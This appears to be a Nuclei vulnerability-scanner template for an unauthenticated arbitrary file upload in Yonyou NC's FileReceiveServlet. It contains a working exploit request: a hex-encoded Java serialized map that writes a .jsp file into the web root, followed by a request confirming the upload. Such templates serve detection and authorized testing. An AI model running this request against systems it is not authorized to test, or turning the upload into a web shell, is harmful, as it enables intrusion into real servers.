nuclei-templates/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-f...

41 lines
1.4 KiB
YAML
Raw Normal View History

2023-09-17 08:51:38 +00:00
id: yonyou-filereceiveservlet-fileupload
2023-09-15 12:23:57 +00:00
info:
name: Yonyou NC FileReceiveServlet - Aribitrary File Upload
author: bjxsec
severity: critical
description: |
An unauthorized attacker can upload a file via the FileReceiveServlet endpoint.
reference:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-arbitrary-file-upload.yaml
metadata:
fofa-query: app="用友-UFIDA-NC"
max-request: 2
2023-09-15 12:23:57 +00:00
verified: true
2023-09-17 16:11:07 +00:00
tags: yonyou,file-upload,intrusive
2023-09-15 12:23:57 +00:00
variables:
file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"
file_content: "{{randstr}}"
http:
- raw:
- |
POST /servlet/FileReceiveServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data;
{{hex_decode("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C7708000000100000000274000946494C455F4E414D45740009")}}{{file_name}}{{hex_decode("7400105441524745545F46494C455F504154487400102E2F776562617070732F6E635F77656278")}}{{file_content}}
- |
GET /{{file_name}} HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && status_code_2 == 200"
- "contains(body_2, '{{file_content}}')"
condition: and